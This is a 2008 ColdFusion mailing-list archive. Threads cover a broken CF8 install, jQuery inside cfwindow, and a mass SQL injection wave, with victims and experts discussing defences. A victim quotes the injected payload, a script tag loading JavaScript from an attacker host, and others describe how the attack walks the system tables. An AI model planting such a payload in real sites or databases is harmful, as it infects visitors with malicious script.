We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). Its intrusion prevention settings are highly configurable, both globally and individually, and with an annual subscription of 200 dollars we get I believe daily upgrades to help configure against new and known issues. In our small shop its been worth every single penny. HTH Mark Kris Jones wrote: I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server). Cheers, Kris ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310385 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
CFwindow and jquery in source
Hi, I have an edit record form with some jquery that exists on it's own and runs fine. I'd also like to call this cfm as a cfwindow source under certain circumstances (parent-child associations). I cannot for the life of me figure out how to get my jquery to run when it is running inside a cfwindow. Anyhelp? Does anyone have any examples of this? I've changed my actual functions inside the $(function(){}) to myFun = function(){}, but I'm thinking that the $(function(){}) line is the issue. Thanks! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310386 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src=http://jjmaoduo.3322.org/csrss/w.js; and a few more things in html I didn't include What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm: CFIF IsDefined(groupid) CFPARAM NAME=groupid TYPE=integer /CFIF CFIF IsDefined(login) CFPARAM NAME=login TYPE=integer /CFIF CFIF IsDefined(sg) CFPARAM NAME=sg TYPE=integer /CFIF CFIF IsDefined(messageid) CFPARAM NAME=messageid TYPE=integer /CFIF CFIF IsDefined(msg) CFPARAM NAME=msg TYPE=integer /CFIF So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses, Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL loop script that was offered by Justin Scott Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy. Bruce Schuman Santa Barbara CA http://originresearch.com ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310387 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
On Thursday 07 Aug 2008, Torrent Girl wrote: I just reinstalled this morning and I DID encounter error What one ! -- Tom Chiverton This email is sent for and on behalf of Halliwells LLP. Halliwells LLP is a limited liability partnership registered in England and Wales under registered number OC307980 whose registered office address is at Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is available for inspection at the registered office. Any reference to a partner in relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The Solicitors Regulation Authority. CONFIDENTIALITY This email is intended only for the use of the addressee named above and may be confidential or legally privileged. If you are not the addressee you must not read it and must not use any information contained in nor copy it nor inform any person other than Halliwells LLP or the addressee of its existence or contents. If you have received this email in error please delete it and notify Halliwells LLP IT Department on 0870 365 2500. For more information about Halliwells LLP visit www.halliwells.com. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310388 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: CFwindow and jquery in source
When you call the cfwindow, have you tried initializing the ready function? -Original Message- From: Justin T [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 11:17 AM To: CF-Talk Subject: CFwindow and jquery in source Hi, I have an edit record form with some jquery that exists on it's own and runs fine. I'd also like to call this cfm as a cfwindow source under certain circumstances (parent-child associations). I cannot for the life of me figure out how to get my jquery to run when it is running inside a cfwindow. Anyhelp? Does anyone have any examples of this? I've changed my actual functions inside the $(function(){}) to myFun = function(){}, but I'm thinking that the $(function(){}) line is the issue. Thanks! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310389 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
We've got the same thing. Sonicwall checks everything coming in and out of the network and checks for anything that matches a database of known injection types. Helps a ton! Matt We drew a great deal of breathing room to implement the solutions discussed here with our installation of Sonicwall firewall (about 600 bucks). Its intrusion prevention settings are highly configurable, both globally and individually, and with an annual subscription of 200 dollars we get I believe daily upgrades to help configure against new and known issues. In our small shop its been worth every single penny. HTH Mark ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310390 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Bruce... Without going into the whole thing, the script runs in your database and selects against the systables and syscolumns tables. It then loops over these and performs updates on existing records. You really need to go back and read the entire thread from 3 weeks ago. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065 It has everything you'd need to know about what this attack does, how to reverse the results, and lastly how to prevent it from happening again. andy -Original Message- From: Bruce Schuman [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 11:17 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src=http://jjmaoduo.3322.org/csrss/w.js; and a few more things in html I didn't include What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm: CFIF IsDefined(groupid) CFPARAM NAME=groupid TYPE=integer /CFIF CFIF IsDefined(login) CFPARAM NAME=login TYPE=integer /CFIF CFIF IsDefined(sg) CFPARAM NAME=sg TYPE=integer /CFIF CFIF IsDefined(messageid) CFPARAM NAME=messageid TYPE=integer /CFIF CFIF IsDefined(msg) CFPARAM NAME=msg TYPE=integer /CFIF So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses, Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL loop script that was offered by Justin Scott Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy. Bruce Schuman Santa Barbara CA http://originresearch.com ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310391 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
What one ! -- Tom Chiverton it didn't say. It just said check the log. I did but see no error. Maybe I have a bad version of CF? I have never had a problem running CF locally. Could this possibly be the permissions on my machine? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310392 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: HELP! SQL Injection Attack!
Bruce Schuman wrote: How do they do this? Yes it is done through the URL. This is well discussed here and in many blogs. But the just gist is that the errant URL parameter is an ENTIRE SQL function that well tell your database to scan every table looking at every field, and if the field is a character field, to append the payload to that field. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310393 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Brad you asked... What output to the screen do you get when you try starting the service from the command line? C:\net start ColdFusion 8 Application Server I tried this again and now I am getting an error: A service specific error occured 2... EXPLANATION A service specific error occured ACTION Refer to the help documentation of that service to determine the problem ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310394 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Installation of CF 8 (developer edition) is not working
Ok I think I may have gotten somewhere with this. I went into SERVICES to check to see if CF was running and it wasn't. I selected RESTART and got the following message: Windows could not start the CF 8 application server on local computer. For more information review the system event log When I check the log, here is what I see: The ColdFusion 8 Application Server service could not be started. Check the server coldfusion log files for more information Any suggestions? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310395 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Installation of CF 8 (developer edition) is not working
Tgirl, When you tried re-install, did you first 'uninstall' CF, and then remove all existing CF directories so that you were doing a 'fresh' install? Dave ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310396 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Here is something that came from one of the CF logs 08/06 14:09:15 error There is no web application configured to service your request coldfusion could not be started because it is already running. coldfusion could not be started because it is already running. java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified) at java.util.zip.ZipFile.open(Native Method) at java.util.zip.ZipFile.init(ZipFile.java:114) at java.util.jar.JarFile.init(JarFile.java:133) at java.util.jar.JarFile.init(JarFile.java:70) Exception in thread main java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified) at java.util.zip.ZipFile.open(Native Method) at java.util.zip.ZipFile.init(ZipFile.java:114) at java.util.jar.JarFile.init(JarFile.java:133) at java.util.jar.JarFile.init(JarFile.java:70) Exception in thread main java.io.FileNotFoundException: C:\ColdFusion8\runtime\lib\jrun.jar (The system cannot find the file specified) at java.util.zip.ZipFile.open(Native Method) at java.util.zip.ZipFile.init(ZipFile.java:114) at java.util.jar.JarFile.init(JarFile.java:133) at java.util.jar.JarFile.init(JarFile.java:70) Exception in thread main ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310397 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: What one ! -- Tom Chiverton it didn't say. It just said check the log. I did but see no error. Maybe I have a bad version of CF? I have never had a problem running CF locally. That might be possible? Is this a downloaded installer? If so did you confirm with the Adobe published download byte size and MD5 hash key that you received a complete and successful download? This is a large and complex enough software that you can get a partial download that will not completely fail but will not succeed either. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310398 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Tgirl, When you tried re-install, did you first 'uninstall' CF, and then remove all existing CF directories so that you were doing a 'fresh' install? * I uninstalled but didn't make sure all of the directories were removed. Should I try again? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310399 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: Installation of CF 8 (developer edition) is not working
* I uninstalled but didn't make sure all of the directories were removed. Should I try again? I would. Based on your last post, your jrun.jar file isn't even there, so you obviously don't have a full installation. I would check the downloaded file size as Ian pointed out. Then, if you can confirm you have a good download, go ahead and uninstall. Then remove all the coldfusion directories. I don't know if it's just c:\ColdFusion8 or not, maybe someone more familiar with 8 could pipe up on that one. There might be some registry entries to remove as well. Sincerely, Dave Phillips ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310400 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Installation of CF 8 (developer edition) is not working
yes, Ian as a matter of fact I remembered seeing an errror message when I downloaded it that it was incomplete. I completely forgot about that. I assumed this was something I could ignore. I downloaded it from the adobe site. Is there a better source to download from? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310401 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: Installation of CF 8 (developer edition) is not working
Is there a better source to download from? No. Delete the download you have (permanently) and then download it again. Maybe even to a different location to be safe. Then check the size/md5 hash to be sure you have a good download. Dave ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310402 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
coldfusion 8: cfsearch type=internet want exact match on cf_custom1
When I index documents I put some metadata in the custom1 field. When I search I use an internet type search and use cf_custom1 to help filter results. An example of the criteria that I set in cfsearch: cf_custom1:Finland currency meaning to only return results with an exact match to Finland in custom1 and content that contains the word currency or derivations. OK, now the problem. According to the documentation since I put Finland in double quotes it should not STEM and only return exact matches. It isn't. I get back results from verity with Finland_2002 in custom1. Anybody have any idea what I am doing wrong? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310403 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Any recommendations for web app firewall? I have worked with Netscreen network firewall for years. -Original Message- From: Dave Watts [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 9:01 AM To: CF-Talk Subject: RE: HELP! SQL Injection Attack! I'd like to know how I can stop the requests from ever hitting the web-server. Can anyone point me at a resource for a firewall solution? I've seen some isapi filter solutions, but they all seem to just clean the querystring and then forward the request on -- so it's still hitting CF. I'd really like to stop it before we get to the web-server at all (let alone the CF application server). You'd need a web application firewall for this. Any ISAPI solution runs in-process with the web server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310404 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: yes, Ian as a matter of fact I remembered seeing an errror message when I downloaded it that it was incomplete. I completely forgot about that. I assumed this was something I could ignore. I downloaded it from the adobe site. Is there a better source to download from? No there is not a better choice, it is just that it is such a large download that if there is any network hiccup during the process you may not always get a complete download. That is why Adobe provides the file size and MD5 numbers so you can confirm you have a complete download before moving forward to avoid the pain you have been suffering. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310405 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: CFwindow and jquery in source
No, I sure haven't. I'm actually not sure what you mean. When you call the cfwindow, have you tried initializing the ready function? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310406 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
No there is not a better choice, it is just that it is such a large download that if there is any network hiccup during the process you may not always get a complete download. That is why Adobe provides the file size and MD5 numbers so you can confirm you have a complete download before moving forward to avoid the pain you have been suffering. Ok I am starting from scratch :) I'll go to lunch and not work on anything else to prvent hiccups (hopefully) ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310407 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! -Original Message- From: Bruce Schuman [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2008 12:17 To: CF-Talk Subject: RE: HELP! SQL Injection Attack! The attack appends JavaScript to character fields. Hi. Just checking in here on SQL injection -- I am a self-taught self-employed CF programmer, been doing this for quite a while, but there is a ton I don't know. And I have been hit by this current wave of injection So, my SQL Server 2005 database doesn't just get one record injected. It's every record in a particular field, all containing (in this attack) this code script src=http://jjmaoduo.3322.org/csrss/w.js; and a few more things in html I didn't include What I have done to protect about 15 CF sites -- is simply require that integer values be integers -- by cfincluding a list of params like this, from application.cfm: CFIF IsDefined(groupid) CFPARAM NAME=groupid TYPE=integer /CFIF CFIF IsDefined(login) CFPARAM NAME=login TYPE=integer /CFIF CFIF IsDefined(sg) CFPARAM NAME=sg TYPE=integer /CFIF CFIF IsDefined(messageid) CFPARAM NAME=messageid TYPE=integer /CFIF CFIF IsDefined(msg) CFPARAM NAME=msg TYPE=integer /CFIF So, this text script has been injected into every record in about five fields in my users table -- and also into a variety of other tables in the same way: every record in that table, in some selected fields. All these injected fields are text fields -- URLs, addresses, Can this be done through a URL? Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Anyway, got my hands full. Any thoughts on this would be great. And yes, I'd like to see the URL loop script that was offered by Justin Scott Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy. Bruce Schuman Santa Barbara CA http://originresearch.com ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310408 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: HELP! SQL Injection Attack!
Can this be done through a URL? Yes, easily. Does the list of fields that have been injected provide any clue about how or where the injection attack occurred? How do these guys, or their program, know my table names and my field names? I have some very obscure field names, and they still get them injected - they are not guessing these things, they know the name of the field. If I wanted to duplicate what they did, I would write a loop that would go through every record in the table, and CFUPDATE that particular record. In fact, I wrote scripts like this to remove this junk, setting the record back to what it was before the injection. How do they do this? Your database contains all its object names in metadata tables, which can be queried directly. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310409 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: HELP! SQL Injection Attack!
And yes, I'd like to see the URL loop script that was offered by Justin Scott I've had many requests for the SQL injection prevention script, so I'm just going to post a URL directly to the code and release it into the public domain for anyone interested: http://www.gravityfree.com/_sqlprev.cfm.txt -Justin Scott ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310410 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
Torrent Girl wrote: Ok I am starting from scratch :) I'll go to lunch and not work on anything else to prvent hiccups (hopefully) When you get your good download, before you run it you will want to make sure you have completely uninstalled all your previous attempts. Here is Adobe knowledge base article on how to manually uninstall ColdFusion. It is titled for MX 6 and 7 but I think it would still apply to 8. If not there should be an 8 version out there somewhere. http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_19187sliceId=1 ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310411 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Installation of CF 8 (developer edition) is not working
From: Torrent Girl [EMAIL PROTECTED] yes, Ian as a matter of fact I remembered seeing an errror message when I downloaded it that it was incomplete. I completely forgot about that. Slaps hand on forehead That would definitely cause you problems. Let us know how it goes after you get a freshly downloaded *complete* install. I'm rather surprised that the install ran at all. ~Brad ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310412 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: HELP! SQL Injection Attack!
Thanks, Andy and Ian -- I am going through this previous thread (I did get hit with this 2 or 3 weeks ago also) -- so, I am just wondering how I can get a basic/minimal level of protection installed, maybe linked from application.cfm I must have 100,000 pages I need to protect -- and my primary database has something like 180 tables, some of which have more than 100 fields. So, I need something I can do quickly. And I got a lot to learn about this. So, just probing this one question -- what people are saying is -- it comes through a URL -- and not a user forms-submission (or at least that seems to be the case) ?? Here's a question: If it is possible to do a basic general-purpose kind of input filtering from application.cfm -- not as good as going through every query, but something that can be done quickly -- would it be possible to write a kind of generic protection script? The specifics of this script would depend on the variables/fieldnames/datatypes -- but if we had a general-purpose script, 1) stop attack type-A 2) stop attack type-B 3) stop attack type-C programmer to fill in the blanks -- ie, itemize the field names and types Could that be done? If that were possible, that would be a great help. Thanks for this good discussion. - Bruce Bruce Schuman wrote: How do they do this? Yes it is done through the URL. This is well discussed here and in many blogs. But the just gist is that the errant URL parameter is an ENTIRE SQL function that well tell your database to scan every table looking at every field, and if the field is a character field, to append the payload to that field. Actually, with this particular SQL injection attack it's really easy to stop. We created a SQL filter that is called from application.cfm. It loops through the URL structure and checks to see if any URL variables contain both a semi-colon and any SQL keyword. If a match is found, it just cfaborts the request and sends us an e-mail with the details. We periodically review those messages and have not found a single false-positive yet after deployment to every site we manage. Granted, it will not stop SQL injection through form posts, but I don't recall ever seeing a SQL injection attack through a form post (yet). At the least it can put an immediate stop to the current flood and give you time to implement other protective measures such as cfqueryparam, etc. We have CF5 and CFMX versions if anyone wants a copy. At 09:25 AM 8/7/2008, you wrote: Bruce... Without going into the whole thing, the script runs in your database and selects against the systables and syscolumns tables. It then loops over these and performs updates on existing records. You really need to go back and read the entire thread from 3 weeks ago. http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065 It has everything you'd need to know about what this attack does, how to reverse the results, and lastly how to prevent it from happening again. andy ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310413 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Installation of CF 8 (developer edition) is not working
